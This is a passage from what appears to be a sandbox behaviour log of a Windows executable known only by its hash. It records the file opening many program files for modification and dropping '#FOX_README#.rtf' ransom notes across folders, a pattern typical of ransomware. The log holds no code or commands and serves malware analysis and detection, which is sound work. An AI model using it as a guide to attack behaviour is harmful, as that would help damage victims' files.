Files\Java\jre7\lib\zi\America\Santa_Isabel f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\MountMove.ps1 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\PopConfirm.m4v f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrmstp.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ResetRevoke.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\setup.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\uninstall.log f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ml.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rio_Branco f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hebron f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 